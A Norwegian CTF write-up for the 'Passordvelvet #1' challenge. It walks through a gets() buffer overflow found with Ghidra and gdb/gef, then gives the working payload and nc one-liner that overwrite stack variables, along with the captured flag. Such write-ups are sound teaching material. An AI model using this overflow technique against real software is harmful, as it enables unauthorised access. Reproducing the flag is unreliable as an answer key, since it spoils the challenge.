View on GitHub

Sikkerhetsdagen 2022 CTF @ UiA

Passordvelvet #1

Vi har lagt et sikkert passordvelv, klarer du å komme deg inn?

ctf.uiactf.no:4001

File: passordvelvet

$ file passordvelvet
passordvelvet: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=dbf580bd679a493f88c9855cd04ee8037f74569a, not stripped

Vi ser at passordvelvet er en 64-bit ELF executable. Filen er ikke strippet for debugsymboler.

$ checksec passordvelvet
[*] '/home/hag/ctfuiano/passordvelvet-1/passordvelvet'
  Arch:   amd64-64-little
  RELRO:  Partial RELRO
  Stack:  No canary found
  NX:    NX enabled
  PIE:   PIE enabled

Jeg åpner passordvelvet i Ghidra for å gjøre en statisk analyse av filen.

Her ser vi en disassembly og pseudo C-kode for main-metoden.

Vi ser at print_flag-metoden gir oss flagget.

Vi må altså sørge for å gi en input til programmet som tar oss til print_flag-metoden.

Vi ser to forskjellige sjekker for å komme til print_flag.

Binary exploitation er ikke min sterkeste side og jeg er rusten med både Ghidra, gdb og r2, men la oss prøve.

Vi vet at vi har en buffer overflow-svakhet i bruken av gets. Dersom vi klarer å overskrive varablene local_18 og local_48 i minnet med de rette verdiene så ender vi opp med å kjøre print_flag-metoden.

Jeg bruker gdb med gef.

$ gdb passordvelvet

gef➤ info functions
All defined functions:

Non-debugging symbols:
0x0000000000001000 _init
0x0000000000001030 putchar@plt
0x0000000000001040 strncmp@plt
0x0000000000001050 puts@plt
0x0000000000001060 fclose@plt
0x0000000000001070 printf@plt
0x0000000000001080 fgetc@plt
0x0000000000001090 gets@plt
0x00000000000010a0 setvbuf@plt
0x00000000000010b0 fopen@plt
0x00000000000010c0 exit@plt
0x00000000000010d0 __cxa_finalize@plt
0x00000000000010e0 _start
0x0000000000001110 deregister_tm_clones
0x0000000000001140 register_tm_clones
0x0000000000001180 __do_global_dtors_aux
0x00000000000011c0 frame_dummy
0x00000000000011c5 print_flag
0x000000000000123a main
0x0000000000001380 __libc_csu_init
0x00000000000013e0 __libc_csu_fini
0x00000000000013e4 _fini
gef➤

Vi ser både main og print_flag i metodelisten. La oss se nærmere på main, men vi må kjøre programmet én gang først for å få de riktige minneadressene:

gef➤ r
Starting program: /home/hag/ctfuiano/passordvelvet-1/passordvelvet
Du har 3 forsøk på å låse opp flagget! :)
Forsøk 0 av 3
Skriv passordet: d
Beklager, sikkerhetslåsen 0x1337 er ikke riktig satt :(
Forsøk 1 av 3
Skriv passordet:
Beklager, sikkerhetslåsen 0x1337 er ikke riktig satt :(
Forsøk 2 av 3
Skriv passordet:
Beklager, sikkerhetslåsen 0x1337 er ikke riktig satt :(
Brukt alle forsøk, prøv igjen senere...[Inferior 1 (process 12053) exited with code 051]
gef➤
gef➤ disas main
Dump of assembler code for function main:
  0x000055555555523a <+0>:   push  rbp
  0x000055555555523b <+1>:   mov  rbp,rsp
  0x000055555555523e <+4>:   sub  rsp,0x40
  0x0000555555555242 <+8>:   mov  QWORD PTR [rbp-0x10],0x1337
  0x000055555555524a <+16>:  mov  QWORD PTR [rbp-0x40],0x0
  0x0000555555555252 <+24>:  mov  QWORD PTR [rbp-0x38],0x0
  0x000055555555525a <+32>:  mov  QWORD PTR [rbp-0x30],0x0
  0x0000555555555262 <+40>:  mov  QWORD PTR [rbp-0x28],0x0
  0x000055555555526a <+48>:  mov  rax,QWORD PTR [rip+0x2e1f]    # 0x555555558090 <stdin@@GLIBC_2.2.5>
  0x0000555555555271 <+55>:  mov  ecx,0x0
  0x0000555555555276 <+60>:  mov  edx,0x2
  0x000055555555527b <+65>:  mov  esi,0x0
  0x0000555555555280 <+70>:  mov  rdi,rax
  0x0000555555555283 <+73>:  call  0x5555555550a0 <setvbuf@plt>
  0x0000555555555288 <+78>:  mov  rax,QWORD PTR [rip+0x2df1]    # 0x555555558080 <stdout@@GLIBC_2.2.5>
  0x000055555555528f <+85>:  mov  ecx,0x0
  0x0000555555555294 <+90>:  mov  edx,0x2
  0x0000555555555299 <+95>:  mov  esi,0x0
  0x000055555555529e <+100>:  mov  rdi,rax
  0x00005555555552a1 <+103>:  call  0x5555555550a0 <setvbuf@plt>
  0x00005555555552a6 <+108>:  lea  rdi,[rip+0xd9b]    # 0x555555556048
  0x00005555555552ad <+115>:  call  0x555555555050 <puts@plt>
  0x00005555555552b2 <+120>:  mov  DWORD PTR [rbp-0x4],0x0
  0x00005555555552b9 <+127>:  jmp  0x555555555358 <main+286>
  0x00005555555552be <+132>:  mov  eax,DWORD PTR [rbp-0x4]
  0x00005555555552c1 <+135>:  mov  esi,eax
  0x00005555555552c3 <+137>:  lea  rdi,[rip+0xdac]    # 0x555555556076
  0x00005555555552ca <+144>:  mov  eax,0x0
  0x00005555555552cf <+149>:  call  0x555555555070 <printf@plt>
  0x00005555555552d4 <+154>:  lea  rdi,[rip+0xdac]    # 0x555555556087
  0x00005555555552db <+161>:  mov  eax,0x0
  0x00005555555552e0 <+166>:  call  0x555555555070 <printf@plt>
  0x00005555555552e5 <+171>:  lea  rax,[rbp-0x40]
  0x00005555555552e9 <+175>:  mov  rdi,rax
  0x00005555555552ec <+178>:  mov  eax,0x0
  0x00005555555552f1 <+183>:  call  0x555555555090 <gets@plt>
  0x00005555555552f6 <+188>:  movabs rax,0x646167656e
  0x0000555555555300 <+198>:  cmp  QWORD PTR [rbp-0x10],rax
  0x0000555555555304 <+202>:  jne  0x55555555533c <main+258>
  0x0000555555555306 <+204>:  lea  rax,[rbp-0x40]
  0x000055555555530a <+208>:  mov  edx,0xa
  0x000055555555530f <+213>:  lea  rsi,[rip+0xd83]    # 0x555555556099
  0x0000555555555316 <+220>:  mov  rdi,rax
  0x0000555555555319 <+223>:  call  0x555555555040 <strncmp@plt>
  0x000055555555531e <+228>:  mov  DWORD PTR [rbp-0x14],eax
  0x0000555555555321 <+231>:  cmp  DWORD PTR [rbp-0x14],0x0
  0x0000555555555325 <+235>:  jne  0x55555555532e <main+244>
  0x0000555555555327 <+237>:  call  0x5555555551c5 <print_flag>
  0x000055555555532c <+242>:  jmp  0x555555555354 <main+282>
  0x000055555555532e <+244>:  lea  rdi,[rip+0xd6f]    # 0x5555555560a4
  0x0000555555555335 <+251>:  call  0x555555555050 <puts@plt>
  0x000055555555533a <+256>:  jmp  0x555555555354 <main+282>
  0x000055555555533c <+258>:  mov  rax,QWORD PTR [rbp-0x10]
  0x0000555555555340 <+262>:  mov  rsi,rax
  0x0000555555555343 <+265>:  lea  rdi,[rip+0xd76]    # 0x5555555560c0
  0x000055555555534a <+272>:  mov  eax,0x0
  0x000055555555534f <+277>:  call  0x555555555070 <printf@plt>
  0x0000555555555354 <+282>:  add  DWORD PTR [rbp-0x4],0x1
  0x0000555555555358 <+286>:  cmp  DWORD PTR [rbp-0x4],0x2
  0x000055555555535c <+290>:  jle  0x5555555552be <main+132>
  0x0000555555555362 <+296>:  lea  rdi,[rip+0xd8f]    # 0x5555555560f8
  0x0000555555555369 <+303>:  mov  eax,0x0
  0x000055555555536e <+308>:  call  0x555555555070 <printf@plt>
  0x0000555555555373 <+313>:  nop
  0x0000555555555374 <+314>:  leave
  0x0000555555555375 <+315>:  ret
End of assembler dump.

Vi vil se nærmere på sjekken som skjer ved addresse 0x0000555555555300.

0x0000555555555300 <+198>: cmp QWORD PTR [rbp-0x10],rax

Dette er den første sjekken. La oss sette et breakpoint her:

gef➤ b *0x0000555555555300
Breakpoint 2 at 0x555555555300

Vi lager oss også et cyclic pattern som vi kan bruke som input:

gef➤ pattern create 100
[+] Generating a pattern of 100 bytes (n=4)
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa
[+] Saved as '$_gef0'

Nå kjører vi programmet og sender inn strengen vi genererte:

gef➤ r
Starting program: /home/hag/ctfuiano/passordvelvet-1/passordvelvet
Du har 3 forsøk på å låse opp flagget! :)
Forsøk 0 av 3
Skriv passordet: aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa

Breakpoint 2, 0x0000555555555300 in main ()

Vi ser at vi treffer Breakpoint 2:

Vi kan se at $rax er 0x646167656e som forventet. $rax sammenlignes med [rbp-0x10] i cmp-instruksjonen og vi ser at [rbp-0x10] peker til en del av pattern‘et vi genererte.

La oss finne offset‘en:

gef➤ patter search maaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa
[+] Searching for 'maaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa'
[+] Found at offset 48 (big-endian search)

Offset er 48. Nå kan vi begynne på payloaden vår. La oss bygge en payload med 48 bytes padding og legge til verdien vi vet at det sammenlignes med; 0x646167656e. Vi må reversere hver byte pga. endianness.

$ python -c 'print("A" * 48 + "\x6e\x65\x67\x61\x64")'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAnegad

La oss kjøre programmet igjen og bruke den nye payloaden vår som input:

gef➤ r
Starting program: /home/hag/ctfuiano/passordvelvet-1/passordvelvet
Du har 3 forsøk på å låse opp flagget! :)
Forsøk 0 av 3
Skriv passordet: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAnegad

Breakpoint 2, 0x0000555555555300 in main ()

Vi ser at vi treffer Breakpoint 2 igjen, men la oss nå se nærmere på [rbp-0x10]:

gef➤ x/s$rbp-0x10
0x7fffffffd880: "negad"
gef➤ x/5x$rbp-0x10
0x7fffffffd880: 0x6e  0x65  0x67  0x61  0x64

Vi ser at vi har oppnådd ønsket verdi i [rbp-0x10]. Vi kan nå sette et nytt breakpoint:

0x0000555555555319 <+223>: call 0x555555555040 <strncmp@plt>

Denne gangen setter vi et breakpoint på 0x0000555555555319 som er strncmp-metoden:

gef➤ b *0x0000555555555319
Breakpoint 3 at 0x555555555319

La oss kjøre programmet igjen med samme payload:

gef➤ r
Starting program: /home/hag/ctfuiano/passordvelvet-1/passordvelvet
Du har 3 forsøk på å låse opp flagget! :)
Forsøk 0 av 3
Skriv passordet: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAnegad

Breakpoint 2, 0x0000555555555300 in main ()

Vi treffer forsatt det første breakpoint’et, men la oss kjøre videre ved å trykke c:

gef➤ c
Continuing.

Breakpoint 3, 0x0000555555555319 in main ()

Vi treffer det neste breakpoint’et:

Dette betyr at vi har kommet forbi den første if-sjekken som forventet. Det som er enda mer interessant er at nå kan vi enkelt se hva som kommer til å skje i strncmp@plt:

strncmp@plt (
  $rdi = 0x00007fffffffd850 → "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAne[...]",
  $rsi = 0x0000555555556099 → "sikkerhets",
  $rdx = 0x000000000000000a
)

Her ser vi parametrene som klargjøres for strncmp-metoden. Vi ser at $rsi peker på strengen sikkerhets som er forventet basert på hva vi så i Ghidra.

$rdi derimot peker på starten av payloaden vår.

$rdx er satt til 0xA (10), dette er lengden på strengen som skal sammenlignes. Dette stemmer også overens med koden i Ghidra og lengden på strengen sikkerhets.

Vi vet nå at strncmp kommer til å feile fordi $rsi og $rdi har ulikt innhold. La oss oppdatere payloaden vår:

$ python -c 'print("sikkerhets" + "A" * 38 + "\x6e\x65\x67\x61\x64")'
sikkerhetsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAnegad

Den nye payloaden vår ser slik ut; sikkerhetsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAnegad. Vi har lagt til sikkerhets som første del av payloaden da vi vet at dette er den samme verdien som finnes i $rsi. I tillegg har vi fjernet 10 A‘er, slik at vi har 38 istedet for 48.

Vi tester den nye payloaden på samme måte som tidligere. r for å kjøre programmet på nytt, c for å hoppe over det første breakpoint‘et. Nå ser vi følgende:

strncmp@plt (
  $rdi = 0x00007fffffffd850 → "sikkerhetsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAne[...]",
  $rsi = 0x0000555555556099 → "sikkerhets",
  $rdx = 0x000000000000000a
)

Dette ser lovende ut! Vi fortsetter med c:

gef➤ c
Continuing.
Kunne ikke finne flagget. Kontakt CTF adm!
[Inferior 1 (process 12546) exited with code 01]

Kunne ikke finne flagget. Kontakt CTF adm!

Vi ser nå at vi har fått en melding fra print_flag-metoden. Som vi så i Ghidra tidligere ser print_flag-metoden etter en flag.txt-fil. Denne finnes ikke lokalt hos oss derfor får vi denne feilmeldingen. La oss prøve payloaden vår på den eksterne tjenesten:

$ nc ctf.uiactf.no 4001
Du har 3 forsøk på å låse opp flagget! :)
Forsøk 0 av 3
Skriv passordet: sikkerhetsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAnegad
UIACTF{må være forsiktig med brukerinput}

Suksess! 🤓😁👍🏻

La oss avslutte med en enkel oneliner for å lese ut flagget:

$ python -c 'print("sikkerhets" + "A" * 38 + "\x6e\x65\x67\x61\x64")' | nc ctf.uiactf.no 4001
Du har 3 forsøk på å låse opp flagget! :)
Forsøk 0 av 3
Skriv passordet: UIACTF{må være forsiktig med brukerinput}

Flag

UIACTF{må være forsiktig med brukerinput}